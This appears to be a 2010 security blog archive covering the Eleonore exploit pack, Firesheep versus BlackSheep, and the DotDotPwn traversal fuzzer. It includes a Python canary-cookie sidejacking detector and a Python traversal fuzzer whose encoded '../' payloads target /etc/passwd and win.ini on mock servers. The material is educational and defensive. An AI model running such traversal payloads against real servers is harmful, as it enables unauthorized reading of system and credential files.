Wednesday, November 10, 2010

Eleonore exploit pack


Exploit packs have been selling in the underground for hundreds of dollars in recent years. These pre-packaged kits are designed to probe the visitor's browser and its plugins for known security vulnerabilities, and then use the first one found as a vehicle to quietly install malicious software. They normally come with a Web administration page, which gives the attacker real-time statistics about victims, such as which browser exploits are working best, and which browsers and browser versions are most successfully attacked. Those commonly found on the market were iPack, Crimepack and Eleonore.

The latter, Eleonore, is the most popular kit and has been making the headlines recently. It is claimed to cost between USD$500 and USD$1000, depending on the version. The package is updated approximately every month with the latest browser, PDF and Java vulnerabilities. The kit providers offer "secured" support, updates and even a cleanup service for the package if necessary.


Eleonore Web administration page


Crimepack Web administration page

w01f's advice: always keep your system patched, especially the Web browser, Java, Flash and PDF reader, since those are exactly the components these kits target.

Tuesday, November 9, 2010

FireSheep Vs BlackSheep

Firesheep
Firesheep is a Firefox extension that demonstrates HTTP session hijacking attacks. HTTP session hijacking (commonly known as sidejacking) is a common attack in which the attacker sniffs network traffic and extracts the victim's session information or cookie. With the session cookie, the attacker can access the victim's account without needing the username and password. It works because many sites at the time authenticate over HTTPS but then send the session cookie in clear text over HTTP, so anyone on the same open or shared network can read it.

I have previously blogged on sidejacking with Ferret and Hamster.

Firesheep is free, open source, and is available now for Mac OS X and Windows.



BlackSheep
BlackSheep, also a Firefox plugin, is designed to combat Firesheep. BlackSheep does this by dropping "fake" session ID information on the wire and then monitoring traffic to see whether it has been hijacked. While Firesheep is largely passive, once it identifies session information for a targeted domain it makes a subsequent request to that same domain, using the hijacked session information, in order to obtain the name of the hijacked user along with an image of the person, if available. It is this request that BlackSheep identifies in order to detect the presence of Firesheep on the network. When it is identified, the user receives the following warning message:
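The canary-cookie trick BlackSheep relies on, written out as an added Python example (this is not BlackSheep's or Firesheep's own code). The traffic, IP addresses, domain and the cookie name `sessionid` are all constructed; the logic is the part that matters: a bait session cookie that no site ever issued is sent on the wire by us, and any other host that later presents that exact value to the same domain can only have sniffed it.

```python
"""Canary-cookie detection of sidejacking, in the spirit of BlackSheep.

Added example, not BlackSheep's or Firesheep's code.  We put a session
cookie on the wire that no real site issued, then flag any *other* host
that later replays it: only a sidejacker that sniffed it knows the value.
"""
import secrets
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class HttpRequest:
    """One plaintext HTTP request as a sniffer would see it (constructed)."""
    src_ip: str   # sender, from the IP header
    host: str     # HTTP Host header
    path: str
    cookie: str   # raw Cookie header value, "" if absent


def parse_cookie_header(raw: str) -> Dict[str, str]:
    """Split 'a=1; b=2' into {'a': '1', 'b': '2'}; malformed parts are ignored."""
    cookies: Dict[str, str] = {}
    for part in raw.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            cookies[name.strip()] = value.strip()
    return cookies


class CanaryDetector:
    def __init__(self, my_ip: str, session_cookie_names: Dict[str, str]) -> None:
        self.my_ip = my_ip
        # domain -> (session cookie name, random bait value).  The cookie names
        # are assumptions; a real deployment uses each site's actual name.
        self.canaries: Dict[str, Tuple[str, str]] = {
            domain: (name, secrets.token_hex(16))
            for domain, name in session_cookie_names.items()
        }

    def bait_request(self, domain: str) -> HttpRequest:
        """The request we send ourselves so the bait cookie appears on the wire."""
        name, value = self.canaries[domain]
        return HttpRequest(self.my_ip, domain, "/", f"{name}={value}")

    def inspect(self, req: HttpRequest) -> Optional[str]:
        """Return an alert string if req replays one of our bait cookies."""
        entry = self.canaries.get(req.host)
        if entry is None:
            return None                      # a domain we did not bait
        name, value = entry
        if parse_cookie_header(req.cookie).get(name) != value:
            return None                      # a real session, or no cookie at all
        if req.src_ip == self.my_ip:
            return None                      # our own bait request
        return (f"ALERT: {req.src_ip} replayed the bait {name} cookie for "
                f"{req.host} (request to {req.path}); sidejacking suspected")

    def scan(self, capture: List[HttpRequest]) -> List[str]:
        return [alert for alert in map(self.inspect, capture) if alert]


def demo() -> List[str]:
    """Constructed capture: our bait, an unrelated real user, then a sidejacker."""
    det = CanaryDetector("192.168.1.10", {"www.example.com": "sessionid"})
    bait = det.bait_request("www.example.com")
    name, value = det.canaries["www.example.com"]
    capture = [
        bait,
        HttpRequest("192.168.1.23", "www.example.com", "/inbox", "sessionid=realuser123"),
        # the sidejacker fetching the "victim's" profile with the sniffed cookie
        HttpRequest("192.168.1.77", "www.example.com", "/profile", f"{name}={value}; lang=en"),
    ]
    return det.scan(capture)


if __name__ == "__main__":
    for alert in demo():
        print(alert)
```

Two caveats a practitioner would want: the bait only works while it is actually on the wire, so it has to be re-sent periodically, and it detects only the hijacker's follow-up request, not the sniffing itself. The real fix is on the site side: serve the whole session over HTTPS and set the `Secure` flag on the session cookie so it is never sent in clear text in the first place.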



Please note that Firesheep and BlackSheep cannot be installed on the same Firefox instance as they share much of the same code base. If you want to run both Firesheep and BlackSheep on the same machine, they should be installed in separate Firefox profiles.

Monday, November 8, 2010

DotDotPwn 2.1

DotDotPwn is a directory traversal fuzzer. It tests HTTP, FTP and TFTP servers for directory traversal vulnerabilities by sending many encodings of the `../` sequence at different depths and watching for the contents of a known file in the response. It is written in Perl and runs on both *NIX and Windows.

It is written by chr1x (a member of our sectester group) and nitr0us. v2.1 has just been released, and it is more flexible and intelligent than before. So far, eight security vulnerabilities have been discovered with this tool. It was also voted to be included in the next release of the BackTrack distro.

Well Done chr1x!!
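To show what a traversal fuzzer of this kind actually does, here is an added Python example (it is not DotDotPwn's code, which is Perl). The payload generator combines several spellings of `..` and of the path separator at increasing depths and looks for a marker string from a known file; the two "servers" it runs against are constructed in-memory models, one with the classic filter that only blocks the literal `../` and one that canonicalises the path before checking it is still under the document root. The target files, markers and document root are assumptions chosen for the demo.

```python
"""Directory traversal fuzzing in the style of DotDotPwn.

Added example, not the tool's own code.  The payload generator is the real
technique; the two 'servers' below are constructed in-memory models so that
everything runs offline.
"""
import posixpath
from itertools import product
from typing import Callable, Iterator, List, Tuple
from urllib.parse import unquote

# Spellings of ".." and of the separator that naive filters miss:
# plain, URL-encoded, mixed, and double-encoded.
DOT_DOT = ["..", "%2e%2e", ".%2e", "%2e.", "%252e%252e"]
SLASH = ["/", "\\", "%2f", "%5c", "%252f", "%255c"]

# (relative target file, string that proves we really read it); assumptions
TARGETS = {
    "unix": [("etc/passwd", "root:")],
    "windows": [("windows/win.ini", "[fonts]"), ("boot.ini", "[boot loader]")],
}


def traversal_payloads(depth: int, os_type: str) -> Iterator[Tuple[str, str]]:
    """Yield (payload, marker) for every dot/separator spelling up to `depth` levels."""
    for target, marker in TARGETS[os_type]:
        for dots, slash in product(DOT_DOT, SLASH):
            for n in range(1, depth + 1):
                # use the same separator spelling inside the target path
                yield (dots + slash) * n + target.replace("/", slash), marker


def fuzz(fetch: Callable[[str], str], depth: int = 3, os_type: str = "unix") -> List[str]:
    """Return every payload whose response contains the marker for its target."""
    hits: List[str] = []
    for payload, marker in traversal_payloads(depth, os_type):
        if marker in fetch(payload):
            hits.append(payload)
    return hits


# ---- constructed targets (assumed docroot and file contents) ---------------
DOCROOT = "/var/www"
FAKE_FS = {
    "/etc/passwd": "root:x:0:0:root:/root:/bin/bash\n",
    "/var/www/index.html": "<html>hello</html>",
}


def vulnerable_server(path_param: str) -> str:
    """Blocks the literal '../' but decodes afterwards, so encoded forms get through."""
    if "../" in path_param:
        return "403 Forbidden"
    decoded = unquote(path_param).replace("\\", "/")
    resolved = posixpath.normpath(DOCROOT + "/" + decoded)
    return FAKE_FS.get(resolved, "404 Not Found")


def hardened_server(path_param: str) -> str:
    """Decode, canonicalise, then refuse anything that left the docroot."""
    decoded = unquote(path_param).replace("\\", "/")
    resolved = posixpath.normpath(DOCROOT + "/" + decoded)
    if resolved != DOCROOT and not resolved.startswith(DOCROOT + "/"):
        return "403 Forbidden"
    return FAKE_FS.get(resolved, "404 Not Found")


if __name__ == "__main__":
    for label, server in (("vulnerable", vulnerable_server), ("hardened", hardened_server)):
        found = fuzz(server)
        print(f"{label}: {len(found)} working payloads")
        for payload in found[:5]:
            print("  ", payload)
```

Against the vulnerable model every single-encoded and backslash variant at depth 2 or more reads `/etc/passwd`, while the plain `../../etc/passwd` is blocked and the double-encoded forms miss because that server only decodes once; against the hardened model nothing works, because the check happens on the canonical path rather than on the raw string. That difference is the whole point of fuzzing with many encodings instead of one.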